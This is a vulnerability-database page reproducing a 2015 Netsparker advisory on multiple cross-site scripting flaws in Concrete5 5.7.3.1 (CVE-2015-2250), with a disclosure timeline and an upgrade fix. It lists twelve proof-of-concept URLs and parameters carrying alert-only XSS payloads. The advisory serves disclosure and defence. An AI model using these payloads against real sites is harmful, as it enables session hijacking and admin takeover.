Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Concrete5 5.7.3.1 Cross Site Scripting

🗓️ 13 May 2015 00:00:00Reported by Onur YILMAZType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 42 Views

Concrete5 5.7.3.1 Cross Site Scripting on Vendor Homepag

Related
Code
ReporterTitlePublishedViews
Family
CNVD		Multiple Scripting Cross-Site Scripting Vulnerabilities in concrete5
20 May 201500:00
cnvd
CVE		CVE-2015-2250
15 May 201518:00
cve
Cvelist		CVE-2015-2250
15 May 201518:00
cvelist
EUVD		EUVD-2015-2356
7 Oct 202500:30
euvd
NVD		CVE-2015-2250
15 May 201518:59
nvd
Packet Storm News		Concrete5 5.7.3.1 Cross Site Scripting
2 Feb 202600:00
packetstormnews
Prion		Cross site scripting
15 May 201518:59
prion
securityvulns		Concrete5 Security Advisory - Multiple XSS Vulnerabilities - CVE-2015-2250
17 May 201500:00
securityvulns
securityvulns		Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
18 May 201500:00
securityvulns
Veracode		Cross-site Scripting (XSS)
27 Jul 201722:23
veracode
Rows per page
`Information  
--------------------  
Advisory by Netsparker.  
Name: Multiple XSS Vulnerabilities in Concrete5  
Affected Software : Concrete5  
Affected Versions: 5.7.3.1 and possibly below  
Vendor Homepage : https://www.concrete5.org  
Vulnerability Type : Cross-site Scripting  
Severity : Important  
CVE-ID: CVE-2015-2250  
Netsparker Advisory Reference : NS-15-008  
  
Description  
--------------------  
By exploiting a Cross-site scripting vulnerability the attacker can  
hijack a logged in user’s session. This means that the malicious  
hacker can change the logged in user’s password and invalidate the  
session of the victim while the hacker maintains access. As seen from  
the XSS example in this article, if a web application is vulnerable to  
cross-site scripting and the administrator’s session is hijacked, the  
malicious hacker exploiting the vulnerability will have full admin  
privileges on that web application.  
  
Technical Details  
--------------------  
Proof of Concept URLs for cross-site scripting vulnerabilities in Concrete5:  
  
URL: /concrete5.7.3.1/index.php/dashboard/system/conversations/bannedwords/success  
Parameter Name: banned_word%5b%5d  
Parameter Type: POST  
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000936)</scRipt>  
  
URL: /concrete5.7.3.1/index.php/dashboard/reports/logs/view?keywords=&level=&channel='"--></style></scRipt><scRipt>alert(0x0044C4)</scRipt>&level[]=600  
Parameter Name: channel  
Parameter Type: GET  
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x0044C4)</scRipt>  
  
URL: /concrete5.7.3.1/index.php/tools/required/permissions/access_entity?peID=1&pdID=3&accessType='"--></style></scRipt><scRipt>alert(0x00690C)</scRipt>  
Parameter Name: accessType  
Parameter Type: GET  
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00690C)</scRipt>  
  
URL: /concrete5.7.3.1/index.php/dashboard/system/multilingual/setup/load_icon  
Parameter Name: msCountry  
Parameter Type: POST  
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00D064)</scRipt>  
  
URL: /concrete5.7.3.1/index.php/tools/required/permissions/access_entity?accessType='"--></style></scRipt><scRipt>alert(0x00687C)</scRipt>&pkCategoryHandle=block_type  
Parameter Name: accessType  
Parameter Type: GET  
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00687C)</scRipt>  
  
URL: /concrete5.7.3.1/index.php/ccm/system/dialogs/area/design/submit?ccm_token=1423928022:7f9b7c3cb0f6721bab4a0dec86cefaa3&cID=1&arHandle='"--></style></scRipt><scRipt>alert(0x00D33A)</scRipt>  
Parameter Name: arHandle  
Parameter Type: GET  
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00D33A)</scRipt>  
  
URL: /concrete5.7.3.1/index.php/dashboard/pages/single  
Parameter Name: pageURL:  
Parameter Type: POST  
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00627A)</scRipt>  
  
URL: /concrete5.7.3.1/index.php/ccm/system/dialogs/area/design?arHandle='"--></style></scRipt><scRipt>alert(0x001D34)</scRipt>&cID=1  
Parameter Name: arHandle  
Parameter Type: GET  
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x001D34)</scRipt>  
  
URL: /concrete5.7.3.1/index.php/dashboard/system/seo/searchindex/updated  
Parameter Name: SEARCH_INDEX_AREA_METHOD  
Parameter Type: POST  
Attack Pattern: '" onmouseover= alert(0x00047E)  
  
URL: /concrete5.7.3.1/index.php/dashboard/system/optimization/jobs/job_scheduled  
Parameter Name: unit  
Parameter Type: POST  
Attack Pattern: '" onmouseover= alert(0x000C5A)  
  
URL: /concrete5.7.3.1/index.php/dashboard/system/registration/open/1  
Parameter Name: register_notification_email  
Parameter Type: POST  
Attack Pattern: '" onmouseover= alert(0x0000DE)  
  
URL: /concrete5.7.3.1/index.php/dashboard/extend/connect/"onmouseover="alert(0x00170E)  
Parameter Name: URI-BASED  
Parameter Type: Full URL:  
Attack Pattern: /"onmouseover="alert(0x00170E)  
  
For more information on cross-site scripting vulnerabilities read the  
following article:  
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/  
  
Advisory Timeline  
--------------------  
05/03/2015 - First Contact  
06/05/2015 - Vulnerability fixed  
11/05/2015 - Advisory released  
  
Solution  
--------------------  
Download Concrete5 version 5.7.4 which includes fix for this vulnerability.  
  
Credits & Authors  
--------------------  
These issues have been discovered by Omar Kurt while testing  
Netsparker Web Application Security Scanner -  
https://www.netsparker.com/web-vulnerability-scanner/  
  
About Netsparker  
--------------------  
Netsparker finds and reports security issues and vulnerabilities such  
as SQL Injection and Cross-site Scripting (XSS) in all websites and  
web applications regardless of the platform and the technology they  
are built on. Netsparker's unique detection and exploitation  
techniques allows it to be dead accurate in reporting hence it's the  
first and the only False Positive Free web application security  
scanner. For more information visit our website on  
https://www.netsparker.com  
  
--   
Onur Yılmaz - Turkey Manager  
  
Netsparker Web Application Security Scanner  
T: +90 (0)554 873 0482  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 May 2015 00:00Current
6.7Medium risk
Vulners AI Score6.7
EPSS0.00393
cross-site scripting vulnerability concrete5 5.7.3.1 important severity cve-2015-2250 netsparker advisory
42